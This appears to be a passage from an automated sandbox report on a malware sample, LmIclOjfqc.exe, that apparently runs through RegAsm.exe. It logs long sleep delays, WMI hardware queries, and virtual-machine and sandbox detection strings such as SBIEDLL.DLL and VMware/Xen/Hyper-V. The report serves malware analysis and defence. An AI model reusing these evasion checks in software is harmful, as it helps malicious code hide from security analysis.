                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: LmIclOjfqc.exe PID: 7264, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory allocated: 4E00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599782Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599657Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599532Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599416Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599297Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599188Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599077Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598844Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597873Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597762Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597607Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595997Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595657Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595180Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595076Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594900Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594782Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594657Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594532Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594407Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594282Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594157Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594047Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593938Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593813Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeWindow / User API: threadDelayed 2497Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeWindow / User API: threadDelayed 984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1824Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7990Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7332Thread sleep count: 2497 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7332Thread sleep count: 984 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99640s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99203s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -99094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -98969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -98859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -98748s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -98640s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -98530s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exe TID: 7296Thread sleep time: -98422s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep count: 36 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7796Thread sleep count: 1824 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7796Thread sleep count: 7990 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599891s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599782s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599657s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599532s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599416s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599297s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599188s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -599077s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598969s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598844s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598735s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598610s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598485s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598360s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598235s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -598110s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597985s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597873s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597762s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597607s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597485s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597360s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597235s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -597110s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596985s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596860s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596735s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596610s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596485s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596360s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596235s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -596110s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595997s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595765s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595657s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595422s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595313s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595180s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -595076s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594900s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594782s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594657s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594532s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594407s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594282s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594157s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -594047s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -593938s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7792Thread sleep time: -593813s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99859Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99750Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99640Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99531Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99422Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99312Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99203Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 99094Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 98969Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 98859Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 98748Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 98640Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 98530Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeThread delayed: delay time: 98422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599782Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599657Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599532Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599416Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599297Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599188Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599077Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598844Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597873Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597762Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597607Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596985Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596610Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596485Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596360Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596235Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596110Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595997Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595657Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595180Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595076Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594900Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594782Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594657Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594532Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594407Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594282Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594157Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594047Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593938Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593813Jump to behavior
                        Source: LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                        Source: LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                        Source: LmIclOjfqc.exe, 00000000.00000002.1932142934.00000000010DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4141213590.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess token adjusted: DebugJump to behavior
